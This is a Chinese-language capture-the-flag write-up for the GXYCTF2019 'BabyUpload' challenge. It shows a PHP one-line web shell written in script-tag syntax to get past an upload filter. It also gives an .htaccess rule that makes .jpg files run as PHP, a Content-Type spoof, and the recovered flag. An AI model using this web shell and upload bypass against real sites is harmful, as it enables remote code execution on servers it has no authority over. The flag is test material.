[GXYCTF2019]BabyUpload
flagflag打开网站,先上传一个.php试试。

提示后缀名不能有ph。
这里想到了之前在ctfhub技能树上做过一道题目,可以上传.htaccess文件,来实现把后缀名为其它类型的转换成php执行,所以这里使用这个方法来上传。
不了解.htaccess的可以先看这篇文章,之后会用到。
开始上传,先编写好一个一句话木马

然后把它改成jpg文件进行上传。
发现出现

这里应该是过滤掉了php代码标志。
那么我们再次进行抓包,查看一下是否又其他可用信息。

在这里我们看到该网站的php为5.6.23版本。
经过查询,了解到php版本在7.0以下可以执行
<script language="php">xxx</script>
来代替php。
所以这里重新写入一句话木马为
<script language="php">eval($_POST['123']);</script>
然后修改文件后缀名为.jpg再次进行上传。

上传成功!!!
之后编写.htaccess文件
AddType application/x-httpd-php .jpg
之后进行上传,抓包

修改application/octet-stream为image/jpeg后放包。
访问上传后图片的地址,之后使用蚁剑进行连接即可。

连接后在根目录中找到flag。

flag{c5741452-3492-43f1-b22c-c60d42e19d48}

浙公网安备 33010602011771号